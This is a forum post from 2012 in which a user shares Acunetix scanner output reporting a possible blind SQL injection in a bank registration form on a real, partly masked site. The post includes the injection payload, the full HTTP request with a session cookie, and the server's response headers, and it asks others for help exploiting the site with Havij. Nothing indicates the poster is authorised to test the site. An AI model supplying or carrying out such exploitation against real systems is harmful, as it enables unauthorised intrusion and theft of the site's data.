Question
dR.fAn0
Hi guys, I've found a vulnerability in a site by using the site crawler in Acunetix . . . It says the link may be vulnerable to BLIND SQLI . . . Here is the data I got:
This vulnerability affects /onlinereg/rtmc_bank/.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input rtmc_reg_no was set to -1' or '66'='66
View HTTP headers
Request
POST /onlinereg/rtmc_bank/ HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=42sq0klh22o83cjq9mf8fa7du5; dynatree-active=; dynatree-focus=; dynatree-expand=; dynatree-select=
Host: 111.68.*.* (Can't expose the site)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

rtmc_reg_no=-1%27%20or%2066%20%3d%20%2764&verify_submitted=Y

Response
HTTP/1.1 200 OK
Date: Fri, 29 Jun 2012 13:08:10 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 7594
Connection: close
Content-Type: text/html; charset=UTF-8
Can anyone please help with how to exploit this by using Havij or some other tool . . .
Any help would be appreciated :huh: